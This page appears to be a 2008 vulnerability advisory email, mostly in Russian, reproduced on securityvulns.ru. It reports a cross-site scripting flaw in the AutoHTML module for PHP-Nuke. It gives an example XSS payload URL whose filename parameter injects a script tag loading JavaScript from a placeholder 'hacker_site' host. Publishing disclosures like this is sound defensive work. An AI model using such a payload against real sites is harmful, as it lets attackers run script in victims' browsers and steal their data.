Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Dot Net Nuke (DNN) <= 4.8.3 XSS Vulnerability

  XEROX DocuShare URL XSS Injection Vulnerabilities

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:30.05.2008
Subject:Cross-Site Scripting vulnerability in AutoHTML for PHP-Nuke

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимости в AutoHTML для PHP-Nuke.

XSS:

http://site/autohtml.php?filename=%3Cscript%20src=http://hacker_site/xss.
js%20

Уязвима версия PHP-Nuke AutoHTML Module 2.0 (и потенциально другие версии).

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/2151/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 



Рейтинг@Mail.ru